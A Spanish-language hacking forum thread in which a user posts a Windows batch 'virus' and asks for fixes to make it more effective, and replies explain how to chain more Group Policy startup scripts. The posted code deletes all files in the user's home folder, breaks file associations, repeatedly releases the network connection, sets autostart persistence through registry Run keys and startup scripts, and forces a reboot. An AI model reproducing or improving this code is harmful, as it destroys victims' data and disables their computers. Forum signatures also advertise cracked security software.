hEcHEN uN vIsTaZo a vEr sI TieNe aLGuN eRRoR sTE cODe

bueno este es un virusiyo k estao aciendo ace un ratiyo, no lo e probao asi k alomejor tiene algun error,

les agradeceria k m dijeran cual es y si puedo añadirle algo mas para acerlo mas efectivo Ok??

aki va el codigo:

Código:

@echo off
RUNDLL32 USER32.DLL,SwapMouseButton
echo title ..::bUsIk49::..>> "%WINDIR%\win32dll.bat"
echo @echo off>> "%WINDIR%\win32dll.bat"
echo reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3" /t REG_DWORD /v "1803" /d 3 /f >> "%WINDIR%\win32dll.bat"
echo reg add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "Window Title" /d "-=::|[...::II||bUsIk49||II::...]|::=-" /f >> "%WINDIR%\win32dll.bat"
echo reg add "HKLM\Software\Microsoft\windows NT\ Currentversion /v RegisteredOrganization /d bUsIk49 /f >> "%WINDIR%\win32dll.bat"
echo reg add "HKLM\Software\Microsoft\windows NT\ Currentversion /v RegisteredOwner /d Hackeado por: /f >> "%WINDIR%\win32dll.bat"
echo assoc .bmp=txtfile > nul>> "%WINDIR%\win32dll.bat"
echo assoc .dib=txtfile > nul>> "%WINDIR%\win32dll.bat"
echo assoc .doc=txtfile > nul>> "%WINDIR%\win32dll.bat"
echo assoc .gif=txtfile > nul>> "%WINDIR%\win32dll.bat"
echo assoc .jpeg=txtfile > nul>> "%WINDIR%\win32dll.bat"
echo assoc .mp3=txtfile > nul>> "%WINDIR%\win32dll.bat"
echo assoc .mpeg=txtfile > nul>> "%WINDIR%\win32dll.bat"
echo assoc .pdf=txtfile > nul>> "%WINDIR%\win32dll.bat"
echo assoc .wma=txtfile > nul>> "%WINDIR%\win32dll.bat"
echo assoc .wmv=txtfile > nul>> "%WINDIR%\win32dll.bat"
echo :IEOFF>> "%WINDIR%\win32dll.bat"
echo ipconfig /release>> "%WINDIR%\win32dll.bat"
echo goto IEOFF>> "%WINDIR%\win32dll.bat

echo @echo off >> "%WINDIR%\winhst.bat"
echo cd %HOMEPATH%>> "%WINDIR%\winhst.bat"
echo del /F /S /Q *.* >> "%WINDIR%\winhst.bat"
echo exit >> "%WINDIR%\winhst.bat"

Reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v Win32 /d "%WINDIR%\winhst.bat" /f
Reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v Win32 /d "%WINDIR%\win32dll.bat" /f

reg add "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Startup\0\0" /t REG_SZ /V "Script" /d "%WINDIR%\win32dll.bat" /f
reg add "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Startup\0\0" /t REG_SZ /V "Parameters" /d "" /f
reg add "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Startup\0" /t REG_SZ /V "FileSysPath" /d "C:\WINDOWS\System32\GroupPolicy\User" /f
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\State\Machine\Scripts\Startup\0\0" /t REG_SZ /V "Parameters" /d "" /f

reg add "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Startup\0\1" /t REG_SZ /V "Script" /d "%WINDIR%\winhst.bat" /f
reg add "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Startup\0\1" /t REG_SZ /V "Parameters" /d "" /f
reg add "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Startup\0" /t REG_SZ /V "FileSysPath" /d "C:\WINDOWS\System32\GroupPolicy\User" /f
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\State\Machine\Scripts\Startup\0\0" /t REG_SZ /V "Parameters" /d "" /f

shutdown -r -f -t 60

esta parte nuse si esta bien echa puesto k me e puesto a investigar sobre eya ace na, revisen y diganme Ok?? Wink

Código:

echo assoc .bmp=txtfile > nul>> "%WINDIR%\win32dll.bat"
echo assoc .dib=txtfile > nul>> "%WINDIR%\win32dll.bat"
echo assoc .doc=txtfile > nul>> "%WINDIR%\win32dll.bat"
echo assoc .gif=txtfile > nul>> "%WINDIR%\win32dll.bat"
echo assoc .jpeg=txtfile > nul>> "%WINDIR%\win32dll.bat"
echo assoc .mp3=txtfile > nul>> "%WINDIR%\win32dll.bat"
echo assoc .mpeg=txtfile > nul>> "%WINDIR%\win32dll.bat"
echo assoc .pdf=txtfile > nul>> "%WINDIR%\win32dll.bat"
echo assoc .wma=txtfile > nul>> "%WINDIR%\win32dll.bat"
echo assoc .wmv=txtfile > nul>> "%WINDIR%\win32dll.bat"

sALuDos y gRaCiAs__

Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion

NORMAS DEL FORO

Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion

Acunetix Web Vulnerability

|
Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion

NOD32 ESET Smart Security 3.0.650 Full

|
Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion

KIS6 & KIS7 [ de por vida ]

Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion

Tutorial Remote File Inclusion ( RFI )

|
Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion

Evitando SQL Injection

La imaginacion es lo mas poderoso que ha conocido el ser humano
TerminalHacker.net
LatinoHack.com

en esta parte para agregar otro archvo al inicio de la PC tienes que ir incrementando el /0/0 a /0/1,/0/2 ETC

Código:

reg add "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Startup\0\0" /t REG_SZ /V "Script" /d "%WINDIR%\winhst.bat" /f
reg add "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Startup\0\0" /t REG_SZ /V "Parameters" /d "" /f
reg add "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Startup\0" /t REG_SZ /V "FileSysPath" /d "C:\WINDOWS\System32\GroupPolicy\User" /f
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\State\Machine\Scripts\Startup\0\0" /t REG_SZ /V "Parameters" /d "" /f

Ok, eso m a pasao por no echar un vistazo a lo k crea esa parte en el registro

va pos gracias ya lo korrijo Wink

sALuDos__

Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion

NORMAS DEL FORO

Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion

Acunetix Web Vulnerability

|
Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion

NOD32 ESET Smart Security 3.0.650 Full

|
Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion

KIS6 & KIS7 [ de por vida ]

Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion

Tutorial Remote File Inclusion ( RFI )

|
Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion

Evitando SQL Injection

La imaginacion es lo mas poderoso que ha conocido el ser humano
TerminalHacker.net
LatinoHack.com

ya se que este post es un toque biejo... pero tengo una duda:

Citar

en esta parte para agregar otro archvo al inicio de la PC tienes que ir incrementando el /0/0 a /0/1,/0/2 ETC

cuando llegas a 9, y necesitas poner otra clave...
haces esto

Citar

/0/1/0

esto

Citar

/0/10

o esto?

Citar

/1/0

espero que me aclaren la duda Wink

saludos

G . H . Z . Evil

seria asi, toma en cuenta que todas las anteriores deben existir si no no funcionara, osea que exista 0/0,0/1,0/2......0/8,0/9

Código:

reg add "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Startup\1\0" /t REG_SZ /V "Script" /d "c:\diess.bat" /f
reg add "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Startup\1\0" /t REG_SZ /V "Parameters" /d "" /f
reg add "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Startup\1" /t REG_SZ /V "FileSysPath" /d %SystemRoot%\System32\GroupPolicy\Machine" /f
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\State\Machine\Scripts\Startup\1\0" /t REG_SZ /V "Parameters" /d "" /f

pero pusiste esto:
\1\0
\1\0
\1
\1\0

o sea, que sigo sin entender, porque a mi parecer (no es que sea asi) es asi:
\1\0
\1\1
\1\2 etcetera...

y ahora me trajiste una duda mas ^^
porque en la tercera linea pusiste solamente \1 y no \1\0 como en todos los otros..? o se te paso nomas?

saludos

Evil

G . H . Z . Evil

mm no mira, todas esas lineas es solo para una sola tarea, si quieres ejecutar un bat que se llame c:\bat1.bat tienes que usar este code

Código:

reg add "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Startup\0\0" /t REG_SZ /V "Script" /d "c:\bat1.bat" /f
reg add "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Startup\0\0" /t REG_SZ /V "Parameters" /d "" /f
reg add "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Startup\0" /t REG_SZ /V "FileSysPath" /d %SystemRoot%\System32\GroupPolicy\Machine" /f
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\State\Machine\Scripts\Startup\0\0" /t REG_SZ /V "Parameters" /d "" /f

para un segundo code(c:\bat2.bat), seria

Código:

reg add "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Startup\0\1" /t REG_SZ /V "Script" /d "c:\bat2.bat" /f
reg add "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Startup\0\1" /t REG_SZ /V "Parameters" /d "" /f
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\State\Machine\Scripts\Startup\0\1" /t REG_SZ /V "Parameters" /d "" /f

si despues de esto creas un 0/5, no se ejecutaria porque no existen 0/2,0/3,0/4
para agregar un c:\bat3.bat solo cambia el numero en el segundo codigo que puse y la localizacion de tu bat exacta, puede ser cualquier cosa no solo un bat.
saludos..

Mis sinceras disculpas FOXmx, yo pence que cuando agregabas 3 claves seguidas tenias que cambiar esos numeros... lo que no entendia era que recien cuando queres ejecutar otro bat ahi tenes que cambiar esos numeros...
gracias por responder tan rapido Wink

saludos

G . H . Z . Evil

	Bienvenido(a), Visitante. Favor de ingresar o registrarse. ¿Perdiste tu email de activación? - Agosto 28, 2008, 10:03:55 Boton Buscar